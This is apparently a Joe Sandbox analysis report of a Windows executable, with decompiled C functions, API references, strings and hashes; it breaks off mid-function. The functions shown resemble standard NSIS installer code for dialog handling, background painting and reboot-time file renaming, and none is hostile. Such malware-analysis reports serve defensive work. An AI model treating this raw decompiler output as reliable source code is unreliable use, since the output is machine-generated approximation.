0x0040504c
0x0040511c
0x0040512f
0x00000000
0x00405052
0x00405055
0x00405058
0x0040505b
0x0040505b
0x00405061
0x0040506a
0x0040506d
0x00405071
0x00405074
0x00405077
0x00405080
0x00405089
0x0040508c
0x0040508f
0x00405092
0x004050d0
0x004050fb
0x004050d2
0x004050e1
0x004050e1
0x00405094
0x00405097
0x004050a5
0x004050af
0x004050b7
0x004050be
0x004050c9
0x004050c9
0x00405092
0x00405101
0x00405102
0x0040510e
0x0040510e
0x0040511a
0x00405135
0x00405138
0x00405155
0x00000000
0x0040513a
0x0040513f
0x00405148
0x004054db
0x004054ed
0x004054ed
0x00405138
0x00000000
0x0040511a
0x0040504c

APIs

GetDlgItem.USER32 ref: 00404EFB
GetDlgItem.USER32 ref: 00404F06
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F50
LoadImageW.USER32 ref: 00404F67
SetWindowLongW.USER32(?,000000FC,004054F0), ref: 00404F80
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F94
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FA6
SendMessageW.USER32(?,00001109,00000002), ref: 00404FBC
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FC8
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FDA
DeleteObject.GDI32(00000000), ref: 00404FDD
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405008
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405014
SendMessageW.USER32(?,00001132,00000000,?), ref: 004050AF
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050DF

Part of subcall function 004044AB: SendMessageW.USER32(00000028,?,00000001,004042D6), ref: 004044B9

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050F3
GetWindowLongW.USER32(?,000000F0), ref: 00405121
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040512F
ShowWindow.USER32(?,00000005), ref: 0040513F
SendMessageW.USER32(?,00000419,00000000,?), ref: 0040523A
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040529F
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052B4
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052D8
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052F8
ImageList_Destroy.COMCTL32(?), ref: 0040530D
GlobalFree.KERNEL32 ref: 0040531D
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405396
SendMessageW.USER32(?,00001102,?,?), ref: 0040543F
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040544E
InvalidateRect.USER32(?,00000000,00000001), ref: 00405479
ShowWindow.USER32(?,00000000), ref: 004054C7
GetDlgItem.USER32 ref: 004054D2
ShowWindow.USER32(00000000), ref: 004054D9

Strings

, xrefs: 004054B1
M, xrefs: 00405097
N, xrefs: 00405178

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
Instruction ID: cd3a3d13ac431be8b4ce3887d4b4ed089ddf64e85d32bcda767c16d05f8e906a
Opcode Fuzzy Hash: 175cf0479e418895b067fb807809c06ca34509b835de2015ac728b6654376382
Instruction Fuzzy Hash: 8D028B70900609AFDB20DFA5CC45EAF7BB5FB85314F10817AE610BA2E1DB798941DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404635 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00404635(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				intOrPtr _t69;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t108;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L13:
						__eflags = _a8 - 0x4e;
						if(_a8 != 0x4e) {
							__eflags = _a8 - 0x40b;
							if(_a8 == 0x40b) {
								 *0x79ff14 =  *0x79ff14 + 1;
								__eflags =  *0x79ff14;
							}
							L27:
							_t114 = _a16;
							L28:
							return E004044DD(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x70b;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b) {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x201;
							if( *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
								_t103 =  *((intOrPtr*)(_t114 + 0x1c));
								_t113 =  *((intOrPtr*)(_t114 + 0x18));
								_v12 = _t103;
								__eflags = _t103 - _t113 - 0x800;
								_v16 = _t113;
								_v8 = 0x7a6a00;
								if(_t103 - _t113 < 0x800) {
									SendMessageW(_t56, 0x44b, 0,  &_v16);
									SetCursor(LoadCursorW(0, 0x7f02));
									_push(1);
									E004048E4(_a4, _v8);
									SetCursor(LoadCursorW(0, 0x7f00));
									_t114 = _a16;
								}
							}
						}
						__eflags =  *((intOrPtr*)(_t114 + 8)) - 0x700;
						if( *((intOrPtr*)(_t114 + 8)) != 0x700) {
							goto L28;
						} else {
							__eflags =  *((intOrPtr*)(_t114 + 0xc)) - 0x100;
							if( *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
								goto L28;
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0xd;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x7a8a68, 0x111, 1, 0);
							}
							__eflags =  *((intOrPtr*)(_t114 + 0x10)) - 0x1b;
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x7a8a68, 0x10, 0, 0);
							}
							return 1;
						}
					}
					__eflags = _a12 >> 0x10;
					if(_a12 >> 0x10 != 0) {
						goto L27;
					}
					__eflags =  *0x79ff14; // 0x0
					if(__eflags != 0) {
						goto L27;
					}
					_t69 =  *0x7a0f20; // 0xa1e104
					_t29 = _t69 + 0x14; // 0xa1e118
					_t116 = _t29;
					__eflags =  *_t116 & 0x00000020;
					if(( *_t116 & 0x00000020) == 0) {
						goto L27;
					}
					_t108 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
					__eflags = _t108;
					 *_t116 = _t108;
					E00404498(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
					E004048C0();
					goto L13;
				} else {
					_t117 = _a16;
					_t75 =  *(_t117 + 0x30);
					if(_t75 < 0) {
						_t75 =  *( *0x7a7a3c - 4 + _t75 * 4);
					}
					_t76 =  *0x7a8a98 + _t75 * 2;
					_t110 =  *_t76 & 0x0000ffff;
					_a8 = _t110;
					_t78 =  &(_t76[1]);
					_a16 = _t78;
					_v16 = _t78;
					_v12 = 0;
					_v8 = E004045E6;
					if(_t110 != 2) {
						_v8 = E004045AC;
					}
					_push( *((intOrPtr*)(_t117 + 0x34)));
					_push(0x22);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t117 + 0x38)));
					_push(0x23);
					E00404476(_a4);
					CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
					E00404498( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
					_t118 = GetDlgItem(_a4, 0x3e8);
					E004044AB(_t118);
					SendMessageW(_t118, 0x45b, 1, 0);
					_t92 =  *( *0x7a8a70 + 0x68);
					if(_t92 < 0) {
						_t92 = GetSysColor( ~_t92);
					}
					SendMessageW(_t118, 0x443, 0, _t92);
					SendMessageW(_t118, 0x445, 0, 0x4010000);
					SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
					 *0x79ff14 = 0;
					SendMessageW(_t118, 0x449, _a8,  &_v16);
					 *0x79ff14 = 0;
					return 0;
				}
			}

0x00404647
0x00404767
0x00404774
0x004047d1
0x004047d1
0x004047d5
0x0040489b
0x004048a2
0x004048a4
0x004048a4
0x004048a4
0x004048aa
0x004048aa
0x004048ad
0x00000000
0x004048b4
0x004047e3
0x004047e9
0x004047ec
0x004047f3
0x004047f5
0x004047fc
0x004047fe
0x00404801
0x00404804
0x00404809
0x0040480f
0x00404812
0x00404819
0x00404826
0x00404837
0x0040483d
0x00404845
0x00404853
0x00404859
0x00404859
0x00404819
0x004047fc
0x0040485c
0x00404863
0x00000000
0x00404865
0x00404865
0x0040486c
0x00000000
0x00000000
0x0040486e
0x00404872
0x00404882
0x00404882
0x00404884
0x00404888
0x00404894
0x00404894
0x00000000
0x00404898
0x00404863
0x0040477c
0x0040477f
0x00000000
0x00000000
0x00404785
0x0040478b
0x00000000
0x00000000
0x00404791
0x00404796
0x00404796
0x00404799
0x0040479c
0x00000000
0x00000000
0x004047c3
0x004047c3
0x004047c5
0x004047c7
0x004047cc
0x00000000
0x0040464d
0x0040464d
0x00404650
0x00404655
0x00404666
0x00404666
0x0040466e
0x00404671
0x00404675
0x00404678
0x0040467c
0x0040467f
0x00404682
0x00404685
0x0040468c
0x0040468e
0x0040468e
0x00404698
0x004046a5
0x004046af
0x004046b4
0x004046b7
0x004046bc
0x004046d3
0x004046da
0x004046ed
0x004046f0
0x00404704
0x0040470b
0x00404710
0x00404715
0x00404715
0x00404723
0x00404731
0x00404743
0x00404748
0x00404758
0x0040475a
0x00000000
0x00404760

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046D3
GetDlgItem.USER32 ref: 004046E7
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404704
GetSysColor.USER32(?), ref: 00404715
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404723
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404731
lstrlenW.KERNEL32(?), ref: 00404736
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404743
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404758
GetDlgItem.USER32 ref: 004047B1
SendMessageW.USER32(00000000), ref: 004047B8
GetDlgItem.USER32 ref: 004047E3
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404826
LoadCursorW.USER32(00000000,00007F02), ref: 00404834
SetCursor.USER32(00000000), ref: 00404837
LoadCursorW.USER32(00000000,00007F00), ref: 00404850
SetCursor.USER32(00000000), ref: 00404853
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404882
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404894

Strings

Call, xrefs: 00404812
N, xrefs: 004047D1

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: Call$N
API String ID: 3103080414-3438112850
Opcode ID: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction ID: dae4caa8b62e847b2ebc6bc8f7d7cc953444b28573a7dbce8249495b0b2e45c9
Opcode Fuzzy Hash: 733b5ee76d40f44ee13d94ce5730b27edf6232bbb6d7c3eda73f746bb046eca6
Instruction Fuzzy Hash: 5361A0B6900609BFDB10AF60DD85E6A7B69FB85314F00C43AF605B62D0C77CA961CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00406160 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406160(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x7a55e8 = 0x55004e;
				 *0x7a55ec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x7a5de8
					_t12 = GetShortPathNameW( *_t2, 0x7a5de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x7a51e8, "%ls=%ls\r\n", 0x7a55e8, 0x7a5de8);
						_t53 = _t52 + 0x10;
						E00406557(_t37, 0x400, 0x7a5de8, 0x7a5de8,  *((intOrPtr*)( *0x7a8a70 + 0x128)));
						_t12 = E0040600A(0x7a5de8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E0040608D(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E00405F6F(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E00405F6F(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00405FC5(_t24 + _t46, 0x7a51e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E004060BC(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E0040600A(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x7a55e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}

0x00406160
0x00406169
0x00406170
0x0040617a
0x0040618e
0x004061b6
0x004061bd
0x004061c1
0x004061c5
0x004061e5
0x004061ec
0x004061f6
0x00406203
0x00406208
0x0040620d
0x00406211
0x00406220
0x00406222
0x0040622f
0x00406233
0x004062ce
0x00000000
0x00406249
0x00406256
0x0040627a
0x0040627e
0x0040629d
0x004062a1
0x004062a1
0x004062a3
0x004062ac
0x004062b7
0x004062c2
0x004062c8
0x00000000
0x004062c8
0x00406280
0x00406283
0x0040628e
0x0040628a
0x0040628c
0x0040628d
0x0040628d
0x00406295
0x00406297
0x00000000
0x00406297
0x00406261
0x00406267
0x00000000
0x00406267
0x00406233
0x00406211
0x00406190
0x0040619b
0x004061a4
0x004061a8
0x00000000
0x00000000
0x004061a8
0x004062d9

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062FB,?,?), ref: 0040619B
GetShortPathNameW.KERNEL32 ref: 004061A4

Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F7F
Part of subcall function 00405F6F: lstrlenA.KERNEL32(00000000,?,00000000,00406254,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FB1

GetShortPathNameW.KERNEL32 ref: 004061C1
wsprintfA.USER32 ref: 004061DF
GetFileSize.KERNEL32(00000000,00000000,007A5DE8,C0000000,00000004,007A5DE8,?,?,?,?,?), ref: 0040621A
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406229
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406261
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,007A51E8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062B7
GlobalFree.KERNEL32 ref: 004062C8
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062CF

Part of subcall function 0040600A: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\aSsc9zh1ex.exe,80000000,00000003,?,?,?,?,?,0040385A,?), ref: 0040600E
Part of subcall function 0040600A: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,0040385A,?), ref: 00406030

Strings

%ls=%ls, xrefs: 004061D5
]z, xrefs: 004061B6
[Rename], xrefs: 00406249, 0040625B
]z, xrefs: 004061BD
Uz, xrefs: 00406189

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]$Uz$]z$]z
API String ID: 2171350718-2304911260
Opcode ID: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
Instruction ID: 21e35848ad9e0a4f6d0f4344ae9360a4b2933efdadd7627ed2dc2072c6695f7b
Opcode Fuzzy Hash: 83841883253fd663560c5337fe6472fb083831e0a70ac9398a254b13b8ba3a8f
Instruction Fuzzy Hash: 2D313771600715BBD220BB659D48F2B3A5CDF86764F16003EFD42F62C2EA7C9821867D

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a8a70;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x7a7a60, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8a68;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}

0x0040100a
0x00401039
0x00401047
0x0040104d
0x00401051
0x0040105b
0x00401061
0x00401064
0x004010f3
0x00401089
0x0040108c
0x004010a6
0x004010bd
0x004010cc
0x004010cf
0x004010d5
0x004010d9
0x004010e4
0x004010ed
0x004010ef
0x004010ef
0x00401100
0x00401105
0x0040110d
0x00401110
0x00401112
0x00401118
0x0040111f
0x00401126
0x00401130
0x00401142
0x00401156
0x00401160
0x00401165
0x00401165
0x00401110
0x0040116e
0x00000000
0x00401178
0x00401010
0x00401013
0x00401015
0x0040101f
0x0040101f
0x00000000

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32 ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32 ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,007A7A60,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction ID: 94ee33a561faf14046f005448635b33146be7beb2ca28ebab25df4912e6f605d
Opcode Fuzzy Hash: 8a25a35e32ca6dce8bd23cc7af0fa44a7ac16e68086679f93291a7c2c2804fa7
Instruction Fuzzy Hash: 9E417C71800209AFCF058FA5DE459AF7BB9FF45315F00802AF991AA1A0CB789A55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00406557 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00406557(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
				struct _ITEMIDLIST* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t44;
				WCHAR* _t45;
				signed char _t47;
				signed int _t48;
				short _t59;
				short _t61;
				short _t63;
				void* _t71;
				signed int _t77;
				signed int _t78;
				short _t81;
				short _t82;
				signed char _t84;
				signed int _t85;
				void* _t98;
				void* _t104;
				intOrPtr* _t105;
				void* _t107;
				WCHAR* _t108;
				void* _t110;

				_t107 = __esi;
				_t104 = __edi;
				_t71 = __ebx;
				_t44 = _a8;
				if(_t44 < 0) {
					_t44 =  *( *0x7a7a3c - 4 + _t44 * 4);
				}
				_push(_t71);
				_push(_t107);
				_push(_t104);
				_t105 =  *0x7a8a98 + _t44 * 2;
				_t45 = 0x7a6a00;
				_t108 = 0x7a6a00;
				if(_a4 >= 0x7a6a00 && _a4 - 0x7a6a00 >> 1 < 0x800) {
					_t108 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				_t81 =  *_t105;
				_a8 = _t81;
				if(_t81 == 0) {
					L43:
					 *_t108 =  *_t108 & 0x00000000;
					if(_a4 == 0) {
						return _t45;
					}
					return E0040651A(_a4, _t45);
				} else {
					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
						_t98 = 2;
						_t105 = _t105 + _t98;
						if(_t81 >= 4) {
							if(__eflags != 0) {
								 *_t108 = _t81;
								_t108 = _t108 + _t98;
								__eflags = _t108;
							} else {
								 *_t108 =  *_t105;
								_t108 = _t108 + _t98;
								_t105 = _t105 + _t98;
							}
							L42:
